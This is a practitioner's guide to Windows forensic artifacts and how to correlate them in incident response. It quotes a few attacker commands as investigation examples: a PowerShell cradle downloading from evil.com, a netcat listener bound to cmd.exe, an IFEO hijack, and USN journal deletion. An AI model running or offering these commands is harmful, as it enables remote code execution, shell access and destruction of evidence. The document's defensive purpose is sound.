🔎 Enhanced Windows Forensic Artifact Master List - 2025 Edition#

A Deep Dive for the Modern DFIR Practitioner

The landscape of Digital Forensics and Incident Response (DFIR) is in a constant state of flux, driven by the evolution of the operating systems we investigate. The journey from Windows 7 to the highly virtualized, cloud-integrated, and security-hardened Windows 11 24H2 has introduced a wealth of new forensic artifacts while altering or even deprecating others. For the modern practitioner, simply knowing what artifacts exist is no longer enough. We must understand their context, their limitations, and most importantly, how to weave them together to tell a coherent story of compromise.

This guide is designed for the intermediate-to-expert DFIR professional. It’s not a list of definitions; it’s a practitioner-focused deep dive into the most critical artifacts in a modern Windows environment. We’ll explore what they are, the evidence they hold, and how to analyze them using the tools of our trade. We will place special emphasis on correlating disparate pieces of evidence to build high-confidence findings, address changes in Windows 11, and acknowledge the ever-present challenge of anti-forensics.

🔎 Execution Evidence — “What ran?”#

Execution is the cornerstone of any investigation. Answering “what ran, when, and by whom?” is fundamental. Fortunately, Windows provides numerous, often redundant, sources to track program execution.

Windows Event Logs (Process Creation)#

• Location / Notes: Security.evtx → Event ID 4688. Requires audit policy. Definitive log of process creation, parent process, and command line.
• Importance: 10/10

What It Is#

Event ID 4688 is the definitive record of process creation on a Windows system. It is not enabled by default. It must be enabled via Group Policy (GPO) or local audit policy (auditpol.exe). Enabling “Audit Process Creation” along with “Include command line in process creation events” is a mandatory first step for any enterprise security monitoring strategy.

Evidence Provided#

This event answers: Who ran what, when? What was the parent process? What were the exact command-line arguments used? It is invaluable for tracking malware execution, lateral movement, and reconnaissance.

Forensic Use Cases#

Use PowerShell’s Get-WinEvent, LogParser, or enterprise SIEMs to query for suspicious process names (powershell.exe, wscript.exe, rundll32.exe), suspicious parent-child relationships (e.g., winword.exe spawning cmd.exe), or keywords in the command line (-enc, IEX, DownloadString).

# PowerShell Example to find PowerShell being launched by an Office App
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | 
Where-Object { $_.Properties[5].Value -like '*powershell.exe*' -and $_.Properties[12].Value -like '*WINWORD.EXE*' }

Limitations & Correlation#

• Not Default: Must be manually enabled
• Log Rollover: Event logs can be overwritten quickly. Ensure log sizes are increased from the default
• Cross-Correlation: Correlate 4688 events with Prefetch (confirms execution), Amcache (provides file hash), and SRUM (shows network activity from the process)

PowerShell Event Logs#

• Location / Notes: Microsoft-Windows-PowerShell/Operational.evtx, transcripts. EID 4104 (Script Block Logging) can capture entire malicious scripts.
• Importance: 10/10

What It Is#

PowerShell v5+ introduced robust logging capabilities that are a game-changer for DFIR. Script Block Logging (EID 4104) records the content of script blocks as they are executed, even de-obfuscating them. Module Logging (EID 4103) logs pipeline execution details. These are enabled via GPO.

Evidence Provided#

This artifact provides the full, de-obfuscated code of fileless malware, reconnaissance commands (Get-Process), and lateral movement tools (Invoke-Command). PowerShell transcripts create a text file record of every command and its output.

Forensic Use Cases#

Filter the Microsoft-Windows-PowerShell/Operational.evtx log for Event ID 4104. Export the script block data and piece it together to reconstruct the full malicious script. Look for suspicious keywords like DownloadString, FromBase64String, invoke-expression, and [System.Reflection.Assembly]::Load.

Practical Example#

An attacker runs a base64-encoded PowerShell command. Event ID 4688 shows powershell -e ..., but Event ID 4104 in the PowerShell operational log will contain the fully decoded script block, revealing a command like: IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1').

Limitations & Correlation#

• Needs Enabling: Requires GPO configuration
• PowerShell Downgrade: Attackers may attempt to launch powershell.exe -Version 2 to bypass modern logging
• Cross-Correlation: Connect a 4104 event with the parent process from Event ID 4688, network connections in SRUM, and payload downloads in browser history

Prefetch (.pf)#

• Location / Notes: C:\Windows\Prefetch\. App execution history: last run times (up to 8), run count, DLLs/files touched. Disabled on servers by default.
• Importance: 9/10

What It Is#

Prefetching is a performance-enhancing feature that creates a .pf file when an application is run. This file lists the files and resources loaded by the executable. It is enabled by default on client OS versions (Win10/11) but disabled on Servers.

Evidence Provided#

It provides the executable name, a run count, and up to 8 timestamps of the last execution times. It also lists the DLLs and files the program accessed, giving context to its function.

Forensic Use Cases#

Use Eric Zimmerman’s PECmd.exe to parse the contents of the Prefetch directory. This will output a CSV file detailing all executions, which can be loaded into a timeline analysis tool.

PECmd.exe -d "C:\path\to\Prefetch" --csv "C:\temp\output"

Limitations & Correlation#

• Timestamps: The .pf file’s creation time is the first run time. The timestamps embedded inside are the last run times
• File Name Based: If an attacker renames mimikatz.exe to svchost.exe, the prefetch file will be named SVCHOST.EXE-XXXXXXXX.pf
• Cross-Correlation: Combine with Amcache (SHA1 hash), Event ID 4688 (command line), and $MFT (file existence)

Amcache.hve#

• Location / Notes: C:\Windows\AppCompat\Programs\Amcache.hve. Execution & install metadata, SHA1 hash, file paths, first run time.
• Importance: 9/10

What It Is#

The Amcache hive is a registry file that stores metadata about applications that have been recently run or installed. It’s a fantastic source for identifying programs executed on a system, especially portable executables.

Evidence Provided#

It provides the full path of the executed program, its file size, the first time it was run, and, most critically, the SHA1 hash of the executable.

Forensic Use Cases#

Use Eric Zimmerman’s AmcacheParser.exe. The SHA1 hash is perfect for pivoting to threat intelligence platforms like VirusTotal.

AmcacheParser.exe -f "C:\path\to\Amcache.hve" --csv "C:\temp\output"

Limitations & Correlation#

• First Run, Not Last: Amcache typically tracks the first run time, not the most recent execution
• Anti-Forensics: The Amcache service can be stopped, or the hive file can be deleted
• Cross-Correlation: Perfect link between execution and file identity. Correlate with Prefetch, 4688, and $MFT

Windows Event Logs (Services)#

• Location / Notes: System.evtx → Event ID 7045 (Service Creation), 7036 (Service Start/Stop). Shows when a malicious service was installed and run.
• Importance: 9/10

What It Is#

The System event log is the authoritative source for Windows Service Control Manager activity. When malware establishes persistence by creating a new service, it leaves behind distinct footprints here.

Evidence Provided#

• Persistence: EID 7045 provides the service name, service file path (the malicious executable), the service type, the start type (e.g., Auto Start), and the user account that installed it
• Execution: EID 7036 shows when the service was started or stopped

Forensic Use Cases#

Filter the System.evtx log specifically for these Event IDs. Scrutinize any 7045 events for services with suspicious names, unusual file paths (e.g., %TEMP% or C:\Users\Public\), or service accounts that don’t align with policy.

Limitations & Correlation#

• Log Rollover: Like all event logs, the System.evtx can roll over
• Cross-Correlation: Link with Registry (SYSTEM\CurrentControlSet\Services\<ServiceName>), executable path in $MFT, and execution evidence in Prefetch/Amcache

🆕 PCA (Program Compatibility Assistant)#

• Location / Notes: C:\Windows\appcompat\pca\. Windows 11 22H2+ execution tracking with timestamps. Advanced capabilities for tracking blocked drivers and installer failures.
• Importance: 9/10

What It Is#

Introduced in Windows 11 22H2 and backported to some Win10 versions, the Program Compatibility Assistant tracks application execution to identify and mitigate compatibility issues. Recent research by Sygnia has revealed additional capabilities beyond basic execution tracking.

Evidence Provided#

Records the full path of executed programs and provides a reliable last updated timestamp. Advanced analysis reveals PCA also tracks:

• Driver Blocking Events: When Windows security mechanisms (Intel CET, HVCI) block drivers
• Installer Failures: Records of failed application installations
• Compatibility Issues: Documentation of applications requiring compatibility fixes

Primary files include PcaAppLaunchDic.txt (execution records), PcaGeneralDb0.txt and PcaGeneralDb1.txt (additional tracking data).

Forensic Use Cases#

The PCA files are not easily human-readable. Use Eric Zimmerman’s LECmd.exe which includes profiles for parsing PCA artifacts. Look specifically for entries that may indicate blocked malware drivers, failed malware installations, or execution of tools from unusual locations.

LECmd.exe -d "C:\path\to\pca\folder" --csv "C:\temp\output"

Advanced Analysis Notes#

Research shows that PCA’s driver blocking functionality creates records when Windows 11’s enhanced security features trigger:

• BlockReasonCet: Intel Control-Flow Enforcement Technology triggered
• BlockReasonHvci: Hypervisor-Protected Code Integrity blocked execution
• BlockReasonOther: Other security mechanisms activated

Limitations & Correlation#

• Modern OS Only: Primarily a Windows 11 22H2+ artifact
• Purpose-Driven: Not a security log - logs what it deems necessary for compatibility purposes
• Cross-Correlation: Pivot to Amcache, Prefetch, and 4688 to corroborate. Check $UsnJrnl for evidence of file creation

ShimCache (AppCompatCache)#

• Location / Notes: SYSTEM hive → AppCompatCache. Lists executed programs. Recent research reveals Windows 10/11 uses last 4 bytes of Data field for execution indication.
• Importance: 8/10

What It Is#

ShimCache is a component of the Application Compatibility Database used by Windows to identify potential application compatibility issues. Recent forensic research has revealed significant changes in how execution can be determined in modern Windows versions.

Evidence Provided#

Lists the full path, file size, and last modified time of executables that have been run or at least considered for execution. Can include programs run from removable media or network shares, even after disconnection.

Modern Windows 10/11 Execution Detection#

Recent research has revealed that the last 4 bytes of the Data field in ShimCache entries can indicate execution status. Eric Zimmerman’s AppCompatCacheParser was updated in March 2023 to properly parse this execution flag, now showing “Yes/No” values for Windows 10/11 systems.

The execution indication uses different values:

• 00 00: Not executed (or uncertain)
• 01 00: Executed
• Additional values like 02 00, 4C 01, and 64 86 have been observed

Forensic Use Cases#

Use Eric Zimmerman’s AppCompatCacheParser.exe (ensure you have a recent version post-March 2023).

AppCompatCacheParser.exe --SYSTEM "C:\path\to\SYSTEM" --csv "C:\temp\output"

Limitations & Correlation#

• Timestamp Limitation: The timestamp is the file’s last modified time, NOT the execution time
• Execution Flag Reliability: While the execution flag provides additional evidence, it should be corroborated
• Cross-Correlation: Use ShimCache to identify file existence, then pivot to Amcache (hash) or Prefetch (execution times)

SRUM (System Resource Usage Monitor)#

• Location / Notes: SRUDB.dat. Tracks application/network resource usage over the last 30-60 days. Correlates processes to users and network activity.
• Importance: 8/10

What It Is#

SRUM is a database that tracks detailed performance and resource usage data for processes. It’s a goldmine for correlating user activity, application execution, and network usage.

Evidence Provided#

SRUM records process start/end times, the user SID that ran the process, the application path, and network data usage (bytes sent/received) per process and per network interface.

Forensic Use Cases#

The SRUDB.dat is an ESE database. Use Eric Zimmerman’s SrumECmd.exe to parse it. This is invaluable for identifying processes that exfiltrated large amounts of data.

SrumECmd.exe -d "C:\Windows\System32\sru" --csv "C:\temp\output"

Limitations & Correlation#

• Limited Retention: Typically holds data for the last 30-60 days
• Cross-Correlation: Master correlation artifact. Find suspicious process, get name and user. Pivot to 4688 logs, Prefetch, and firewall logs

🆕 Capability Access Manager (CAM)#

• Location / Notes: SQLite database tracking app access to system resources. Windows 11 23H2/24H2. 30-day retention limitation.
• Importance: 8/10

What It Is#

A new artifact in Windows 11 (23H2+), the CAM is a set of SQLite databases that track application access to sensitive resources like the camera, microphone, location, and user data. Recent academic research has confirmed its forensic reliability.

Evidence Provided#

Can directly prove that a specific application accessed sensitive user resources. The CAM database tracks:

• Camera Access: Applications that accessed camera hardware
• Microphone Access: Audio recording attempts and permissions
• Location Data: GPS and location service usage
• Document Access: Applications accessing user documents, photos, contacts
• Resource Request Timing: When applications requested and received permissions

Forensic Use Cases#

Use a standard SQLite browser or dedicated forensic tools. Look for suspicious application names accessing resources they have no business using (e.g., calc.exe accessing the microphone).

Key forensic queries should focus on:

• Applications accessing sensitive hardware without legitimate business need
• Temporal analysis of privacy-sensitive resource access
• Applications bypassing normal permission prompts

Limitations & Correlation#

• Very New: Tool support continues to evolve
• 30-Day Retention: Data retention limited to approximately 30 days
• Request-Based: Only logs applications that actively request CAM-managed resources
• Cross-Correlation: If suspicious app accessed microphone, look for execution evidence in Amcache/Prefetch, network connections in SRUM

WER (Windows Error Reporting)#

• Location / Notes: C:\ProgramData\Microsoft\Windows\WER\. Crash logs. Often contains evidence of malware that has failed or is unstable.
• Importance: 8/10

What It Is#

When an application crashes, WER collects data about the incident, including process memory dumps, lists of loaded modules, and system information.

Evidence Provided#

Attackers often use unstable tools that crash. These crash reports can contain invaluable evidence. The user-mode memory dumps (.dmp files) can contain strings, IP addresses, or encryption keys from the malicious process.

Forensic Use Cases#

Manually browse the WER directories. The Report.wer files are text-based and can be reviewed for process names and loaded modules. The .dmp files can be analyzed with WinDbg or Volatility.

Limitations & Correlation#

• Not Guaranteed: Only logs crashes, not successful execution
• Can be Disabled: Attackers may disable Windows Error Reporting
• Cross-Correlation: WER report proves program ran and failed. Use executable name to pivot to all other execution artifacts

BAM/DAM (Background/Desktop Activity Moderator)#

• Location / Notes: SYSTEM hive → ...\Bam\UserSettings & ...\Dam\UserSettings. Tracks executed applications. 7-day retention with automatic cleanup.
• Importance: 8/10

What It Is#

The BAM and DAM are services that control application activity. Their registry keys contain a cache of recently executed applications and their full paths, along with last execution timestamp. BAM was introduced in Windows 10 version 1709.

Evidence Provided#

Provides the full path to an executed program and its last execution timestamp (in UTC), linked to a specific user SID. Excellent source for quick execution timelines with strong user attribution.

Important Behavioral Notes#

Recent research has revealed key BAM characteristics:

• 7-Day Retention: Entries older than 7 days are automatically removed during system boot
• Boot-Time Writing: Data is written to registry during system shutdown/reboot cycles
• Local Execution Only: Only locally executed applications generate BAM entries
• Console Application Exclusion: Command-line applications typically don’t generate BAM entries

Forensic Use Cases#

Use Eric Zimmerman’s RBCmd.exe or RegRipper. These tools will automatically parse the BAM/DAM keys for all user SIDs.

RBCmd.exe --SYSTEM "C:\path\to\SYSTEM" --csv "C:\temp\output"

Limitations & Correlation#

• Limited Scope: Doesn’t track all executions, just those monitored by BAM/DAM service
• 7-Day Window: Automatic cleanup means evidence older than a week is lost
• Cross-Correlation: Verify with Prefetch (run count), SRUM (user/network context), and $MFT (file timestamps)

UserAssist#

• Location / Notes: NTUSER.DAT → Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist. ROT13 encoded run counters/timestamps for apps launched via Explorer GUI.
• Importance: 7/10

What It Is#

UserAssist tracks applications launched through the Windows Explorer GUI (e.g., clicking an icon on the desktop or Start Menu). It maintains a run count and a last executed timestamp for each program.

Evidence Provided#

Shows what programs a user actively launched via the GUI, along with a run count and last run time, helping to establish patterns of application use.

Forensic Use Cases#

The data is stored ROT13-encoded within the NTUSER.DAT hive. Use forensic suites or Eric Zimmerman’s UserAssistParser.exe to automatically decode and parse the entries.

Limitations & Correlation#

• GUI Only: Does not track programs launched from the command line
• Timestamp Focus: The timestamp can sometimes be “last focus” time rather than “last execution”
• Cross-Correlation: Correlate with Prefetch for comprehensive view of run counts and times

RunMRU Command History#

• Location / Notes: NTUSER.DAT → Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Tracks commands typed into the Run box (Win+R).
• Importance: 7/10

What It Is#

This registry key stores a Most Recently Used (MRU) list of commands typed into the Windows Run box (Win+R).

Evidence Provided#

Shows exactly what commands a user (or attacker) typed. This can include paths to executables, UNC paths for lateral movement (\\SERVER\C$), or short commands to launch scripts.

Practical Example#

An investigator finds the following entries: cmd.exe, \\10.1.1.5\admin$, C:\Users\Public\nc.exe -l -p 4444 -e cmd.exe. This sequence tells a clear story of an attacker opening a command prompt, accessing a remote share, and setting up a reverse shell.

Limitations & Correlation#

• Ephemeral: The list is typically short (around 25 entries) and overwrites itself
• Run Box Only: Only tracks commands from the Win+R dialog
• Cross-Correlation: For each command, look for corresponding execution evidence in 4688 logs, Prefetch, and SRUM

RecentFileCache.bcf#

• Location / Notes: C:\Windows\AppCompat\Programs\RecentFileCache.bcf. Pre-Win10 artifact that can show execution evidence not found elsewhere.
• Importance: 6/10

What It Is#

A legacy artifact from pre-Windows 10 systems, but it can still be found on upgraded systems. It was used to track recently executed files for the AppCompat framework.

Evidence Provided#

Can contain paths to executables not found in other, more modern artifacts, making it a good “long tail” source of evidence.

Forensic Use Cases#

Use Eric Zimmerman’s RecentFileCacheParser.exe to parse the file.

RecentFileCacheParser.exe -f "C:\path\to\RecentFileCache.bcf" --csv "C:\temp\output"

Limitations & Correlation#

• Legacy: Do not rely on this as a primary source on Win10/11
• No Timestamps: The format does not contain timestamps, providing only the path
• Cross-Correlation: If you find a unique executable, search for that executable name in all other execution artifacts

🛠 Persistence Mechanisms — “How did it stick around?”#

Run Keys & Startup Folders#

• Location / Notes: HKLM/HKCU ...Run, ...RunOnce keys, C:\ProgramData\... & %AppData%\... Startup folders. The most common persistence method.
• Importance: 9/10

What It Is#

These are the most common and least sophisticated methods of persistence. Any program or script path placed in these registry keys or file system folders will be executed automatically at system boot or user logon.

Forensic Use Cases#

This is low-hanging fruit in any investigation. Use Autoruns from Sysinternals, or Velociraptor’s persistence artifact collectors to quickly enumerate the contents of these locations. Look for non-standard entries, paths pointing to temporary or user-writable locations, and suspicious script runners.

Limitations & Correlation#

• Noisy: These locations can be filled with legitimate third-party application updaters
• Cross-Correlation: Correlate executable path with Amcache (hash), Prefetch (execution count), and $MFT (file creation time)

Services (Registry)#

• Location / Notes: SYSTEM hive → CurrentControlSet\Services. Malware installing itself as a system service to run with high privileges.
• Importance: 9/10

What It Is#

Malware often installs itself as a service to ensure it runs automatically with high privileges (often NT AUTHORITY\SYSTEM). The configuration for all system services is stored in this registry key.

Evidence Provided#

The registry key for a service contains its display name, the ImagePath (path to the executable and any arguments), the Start type (2=Automatic), and the user account it runs as.

Forensic Use Cases#

Manually examine this key or use persistence-hunting tools. Look for services with suspicious names, descriptions, or ImagePath values pointing to executables in non-standard locations. Correlate findings with Event ID 7045 in the System log.

Limitations & Correlation#

• Can Be Hidden: Attackers might give a malicious service a name that looks legitimate
• Cross-Correlation: Link to Event ID 7045 (installation event), service executable on disk ($MFT), and execution evidence (Prefetch, Amcache)

Scheduled Tasks (.job / XML)#

• Location / Notes: C:\Windows\System32\Tasks\. Task Scheduler logs & XML task files. Allows for persistence across reboots and on specific triggers.
• Importance: 9/10

What It Is#

The Windows Task Scheduler allows programs to be run on a schedule or triggered by specific system events. Attackers abuse this heavily for persistence. In modern Windows (Vista+), tasks are defined by XML files.

Evidence Provided#

The task’s XML file reveals the trigger (when it runs), the action (what command is executed), and the user context. This can expose C2 callbacks, secondary payload execution, and more.

Forensic Use Cases#

Use Autoruns or manually inspect the Tasks folder. Parse the XML files to determine the full command line. The Task Scheduler operational log (Microsoft-Windows-TaskScheduler/Operational.evtx) shows when a task was created (EID 106), executed (EID 200), and completed (EID 201).

Limitations & Correlation#

• Can Be Hidden: Tasks can be created in a way that hides them from the default GUI
• Cross-Correlation: XML file gives you the payload path. Pivot to $MFT, Prefetch, 4104 PowerShell logs, and Event ID 4688 around task creation time

WMI Event Subscriptions#

• Location / Notes: OBJECTS.DATA (root\subscription namespace). Extremely stealthy and powerful event-driven persistence.
• Importance: 9/10

What It Is#

An extremely stealthy “fileless” persistence method. Attackers can create WMI subscriptions that trigger a malicious action based on a system event. It consists of three parts: a filter (the event), a consumer (the action), and a binding.

Evidence Provided#

Reveals event-driven execution logic that may not have a corresponding file on disk. The consumer will contain the malicious script or command to be executed.

Forensic Use Cases#

This is difficult to parse manually from the OBJECTS.DATA file. Use PowerShell tools on a live system or specialized tools like Velociraptor’s WMI persistence artifact.

Get-WmiObject -Namespace root\Subscription -Class __EventFilter
Get-WmiObject -Namespace root\Subscription -Class __EventConsumer
Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding

Limitations & Correlation#

• Stealth: Often missed by traditional AV and host-based tools that are file-centric
• Complexity: Understanding the WQL query in the event filter is key
• Cross-Correlation: If malicious WMI consumer executes PowerShell, look for PowerShell logs (4104) and process creation events (4688) for WmiPrvSE.exe spawning powershell.exe

IFEO (Image File Execution Options)#

• Location / Notes: HKLM ...\Image File Execution Options. Can hijack legitimate executable calls to run a malicious “debugger” instead.
• Importance: 9/10

What It Is#

IFEO is a developer feature that allows for attaching a debugger to an executable when it’s launched. Attackers abuse this to hijack legitimate processes. When an executable with an IFEO key is run, the OS looks for a “Debugger” value and runs that program instead.

Evidence Provided#

This is direct evidence of process hijacking. It shows an attacker’s intent to either intercept a process or use a trusted process name to launch their own malware.

Forensic Use Cases#

Examine the subkeys under IFEO. If an attacker creates a key for notepad.exe and adds a Debugger value pointing to C:\evil\malware.exe, then every time a user tries to run Notepad, the malware will be executed instead.

Limitations & Correlation#

• Requires Admin: Creating keys in HKLM requires administrator privileges
• Cross-Correlation: Investigate the executable listed in the “Debugger” value. Look for its Amcache entry (hash), Prefetch file (execution times), and file metadata in $MFT

Winlogon Keys#

• Location / Notes: HKLM ...\Winlogon (Shell, Userinit). Hijacking these keys can replace the default shell or inject processes at logon.
• Importance: 9/10

What It Is#

This registry key contains values that control the user logon process. Hijacking values like Shell (default: explorer.exe) or Userinit (default: userinit.exe) allows an attacker to execute malware during the boot/logon sequence.

Evidence Provided#

Modified values in this key are a strong indicator of persistence designed to run with high privilege at an early stage of system startup or user logon.

Forensic Use Cases#

Check the values in this key against known-good defaults. Any modification, especially appending a path to a malicious executable, is a major red flag for persistence.

Limitations & Correlation#

• Requires Admin: Modifying HKLM keys requires high privileges
• Cross-Correlation: Correlate the path found with $MFT, Prefetch, Amcache, and Event ID 4688 showing winlogon.exe as parent

COM Hijacking (Registry)#

• Location / Notes: HKCU/HKLM \Software\Classes\CLSID\ → InProcServer32 key. Stealthy method replacing a legitimate COM object’s DLL with a malicious one.
• Importance: 9/10

What It Is#

A stealthy technique where an attacker replaces the path to a legitimate DLL in a Component Object Model (COM) object’s registry entry (InProcServer32 key) with a path to their own malicious DLL. When a legitimate application tries to load the COM object, the malicious DLL is loaded into its process space.

Evidence Provided#

Shows a sophisticated, often fileless (in the sense of a standalone .exe) persistence method that leverages legitimate application process space to run malicious code.

Forensic Use Cases#

Requires deep registry analysis. Tools like Autoruns are essential for spotting common COM hijack points by highlighting non-standard paths or unsigned DLLs in COM keys.

Limitations & Correlation#

• Stealthy and Complex: Very difficult to spot manually due to the sheer number of COM entries
• Cross-Correlation: If suspicious DLL is identified, analyze that DLL. Look for creation time in $MFT and check Event ID 4688 logs for suspicious child processes

🖥️ File System Timelines — “What happened on disk?”#

$MFT (Master File Table)#

• Location / Notes: Master File Table; metadata on every file/directory on an NTFS volume, including timestamps, size, and location. Ground truth for the filesystem.
• Importance: 10/10

What It Is#

The Master File Table is the heart of the NTFS filesystem. It’s a database that contains at least one entry for every file and directory on the volume. This entry stores all file metadata.

Evidence Provided#

The $MFT provides the “ground truth” for file system activity. It contains the filename, size, physical location on disk, and—most importantly—eight timestamps for each file: a Modified, Accessed, Created, and entry changed (MACB) time for both the $STANDARD_INFORMATION (SI) and $FILE_NAME (FN) attributes. This is crucial for building timelines.

Forensic Use Cases#

No investigation is complete without parsing the $MFT. Use tools like Eric Zimmerman’s MFTECmd.exe or Plaso’s log2timeline to extract all file metadata into a bodyfile format, which can then be used in tools like Timeline Explorer to create a super timeline of all file system activity.

MFTECmd.exe -f "C:\path\to\$MFT" --csv "C:\temp\output"

Limitations & Correlation#

• Timestomping: Attackers can modify the $SI timestamps, but modifying the $FN timestamps is much more difficult
• Cross-Correlation: The ultimate correlation artifact. Timestamps for a malicious file should be used to scope searches in Event Logs, Prefetch files, LNK files, and all other time-based artifacts

$UsnJrnl (Update Sequence Number Journal)#

• Location / Notes: $Extend\$UsnJrnl:$J. Change journal tracking all NTFS file system changes with sequence numbers and timestamps.
• Importance: 9/10

What It Is#

The USN Journal is a change log maintained by NTFS that records file system changes. Every file creation, deletion, modification, or metadata change generates a USN record with a monotonically increasing sequence number.

Evidence Provided#

It provides a chronological record of all file system activity, including files that have been deleted. Each record contains the full file path, the type of change (create, delete, modify), timestamps, and file reference numbers that can be correlated with the $MFT.

Forensic Use Cases#

Use Eric Zimmerman’s MFTECmd.exe with the --j parameter to parse the USN Journal. This creates a timeline of all file system changes, invaluable for tracking attacker activity, especially file staging, execution, and cleanup attempts.

MFTECmd.exe --j "C:\path\to\$UsnJrnl_$J" --csv "C:\temp\output"

Limitations & Correlation#

• Size Limitations: The journal has a maximum size and will overwrite old entries when full
• Can Be Cleared: Attackers may attempt to clear the USN Journal using fsutil usn deletejournal
• Cross-Correlation: Correlate with $MFT entries using file reference numbers. Look for patterns of file creation followed by execution artifacts

LNK Files (Windows Shortcuts)#

• Location / Notes: Various locations including Recent folders, Desktop, Start Menu. Contains rich metadata about target files and system information.
• Importance: 8/10

What It Is#

Windows Shortcut files contain not just a link to a target file, but also rich forensic metadata about the target file, the volume it resided on, and the system that created the shortcut.

Evidence Provided#

LNK files contain timestamps of the target file, volume serial numbers, MAC addresses, machine identifiers, and full path information. This data persists even after the target file is deleted, making LNK files valuable for proving file existence and system connectivity.

Forensic Use Cases#

Use Eric Zimmerman’s LECmd.exe to parse LNK files. Pay attention to files in user Recent folders (%APPDATA%\Microsoft\Windows\Recent), but also examine shortcuts on the Desktop and in the Start Menu for evidence of executed files.

LECmd.exe -d "C:\path\to\Recent" --csv "C:\temp\output"

Limitations & Correlation#

• User-Dependent: Only created when users interact with files through the GUI
• Can Be Deleted: Users or attackers may delete shortcut files
• Cross-Correlation: Match LNK file target information with $MFT records, Prefetch files, and Jump Lists

Jump Lists#

• Location / Notes: %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations and CustomDestinations. Recent file access per application.
• Importance: 8/10

What It Is#

Jump Lists are a Windows 7+ feature that tracks recently accessed files per application to provide quick access through the taskbar and Start Menu. They’re stored as OLE compound documents containing embedded LNK-like structures.

Evidence Provided#

Jump Lists show which files were accessed by which applications, when they were accessed, and preserve this information even after files are deleted. They provide strong user-to-file attribution.

Forensic Use Cases#

Use Eric Zimmerman’s JLECmd.exe to parse Jump List files. Each application has its own Jump List file named by AppID hash. This is particularly valuable for document-based investigations.

JLECmd.exe -d "C:\path\to\AutomaticDestinations" --csv "C:\temp\output"

Limitations & Correlation#

• Application-Specific: Only applications that opt into Jump Lists will generate these artifacts
• Privacy Settings: Users can disable Jump Lists or clear them manually
• Cross-Correlation: Correlate with $MFT records for target files, Event ID 4688 for application execution, and Prefetch files

🌍 Network & Remote Access — “Who connected where?”#

Security Event Logs#

• Location / Notes: Security.evtx → Logons (4624), Failed Logons (4625), Kerberos (4768-4771), Special Privilege Use (4672). Bedrock of intrusion analysis.
• Importance: 10/10

What It Is#

The Security event log is the primary source for tracking authentication and access control on a Windows system. Proper auditing must be enabled via GPO.

Evidence Provided#

• Logon/Logoff: Who logged on (4624), when, from where (source IP), and with what type of logon (e.g., Type 3 for network, Type 10 for RDP)
• Failed Logons (4625): Indicates brute-force attempts or password spraying
• Account Usage: Kerberos ticket requests (4768, 4769) track service access. Special privilege use (4672) shows when powerful rights are exercised

Forensic Use Cases#

This is a core component of any intrusion investigation. Filter logs for logon events from suspicious source IPs. Look for a high volume of failed logons followed by a success. Scrutinize all Type 3 and Type 10 logons to track lateral movement.

Limitations & Correlation#

• Requires Policy: Like process creation auditing, this is not fully enabled by default
• Logon Type Nuance: Understanding the difference between logon types is critical for accurate analysis
• Cross-Correlation: Successful RDP logon (4624, Type 10) should be correlated with TerminalServices Event Logs, RDP Bitmap Cache, and process execution artifacts

RDP Artifacts#

• Location / Notes: Multiple locations including TerminalServices-RDPClient, bitmap cache, and registry keys. Evidence of outbound and inbound RDP connections.
• Importance: 9/10

What It Is#

Remote Desktop Protocol artifacts provide evidence of both incoming and outgoing RDP connections. These artifacts are scattered across multiple locations but provide comprehensive evidence of remote access activity.

Evidence Provided#

• Outbound RDP: Registry keys showing servers the system connected to as a client
• Inbound RDP: Event logs showing who connected to this system via RDP
• Session Details: Username, source IP, connection/disconnection times
• Bitmap Cache: Screenshots of remote desktop sessions (for outbound connections)

Key Artifact Locations#

• Event Logs: Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
• Registry: HKCU\Software\Microsoft\Terminal Server Client\Servers
• Bitmap Cache: %USERPROFILE%\AppData\Local\Microsoft\Terminal Server Client\Cache

Forensic Use Cases#

Use a combination of event log analysis and registry examination. The bitmap cache can provide actual screenshots of remote sessions, which can be invaluable evidence. Look for Event IDs 21, 22 (logon/logoff), 24, 25 (disconnection/reconnection).

Limitations & Correlation#

• Bitmap Cache Limitations: Only available for outbound RDP connections and may be cleared by the user
• Event Log Retention: Limited by event log size and retention policies
• Cross-Correlation: Correlate RDP evidence with Security Event Logs (4624/4625), Network Connection Logs, and Process Execution artifacts

Network Connection Artifacts#

• Location / Notes: Various locations including SRUM, event logs, and registry keys. Evidence of network connectivity and data transfer.
• Importance: 9/10

What It Is#

Multiple Windows artifacts track network connections and data usage, providing evidence of communication with external hosts, data exfiltration, and network reconnaissance.

Evidence Provided#

• Connection History: Which processes made network connections and when
• Data Volume: Bytes sent/received per process and network interface
• Network Profile Information: Wi-Fi SSIDs, network types, connection times
• DNS Resolution: Evidence of hostname lookups

Key Artifact Sources#

• SRUM Database: Detailed process-level network usage statistics
• Event Logs: Various network-related event logs
• Registry: Network profile information and connection history
• DNS Client Cache: Recent DNS lookups (live systems only)

Forensic Use Cases#

Parse the SRUM database for detailed network usage patterns. Look for processes with unusual data usage patterns that might indicate exfiltration. Examine network profiles for evidence of connections to attacker infrastructure.

Limitations & Correlation#

• Retention Periods: Various artifacts have different retention periods
• Process Attribution: Some network activity may not be clearly attributed to specific processes
• Cross-Correlation: Combine network evidence with Process Execution artifacts, Event Logs, and Memory Analysis

🧠 Volatile & Memory — “What’s in RAM?”#

RAM Capture (.mem, .vmem)#

• Location / Notes: A bit-for-bit copy of physical memory. The only source for fileless malware, injected code, running processes, sockets, credentials, and more.
• Importance: 10/10

What It Is#

A snapshot of the contents of a computer’s physical memory (RAM) at a specific point in time. It is the most volatile and often the richest source of evidence.

Evidence Provided#

Memory analysis can reveal running processes (even those hidden by rootkits), active and recent network connections, loaded DLLs, injected code, open registry keys, and cleartext credentials or encryption keys that are only resident in memory. It is the only way to analyze truly “fileless” malware.

Forensic Use Cases#

Use a memory acquisition tool like FTK Imager or Belkasoft RAM Capturer to acquire the RAM. Analyze the resulting image with tools like Volatility or Rekall. Common plugins include pstree (process tree), netscan (network connections), malfind (injected code), and hivelist (registry hives in memory).

python vol.py -f memory.vmem windows.pslist.PsList
python vol.py -f memory.vmem windows.netscan.NetScan

Limitations & Correlation#

• Volatility: Memory contents are lost on shutdown. Acquisition must be performed on a live system
• Complexity: Memory analysis requires significant expertise and knowledge of OS internals
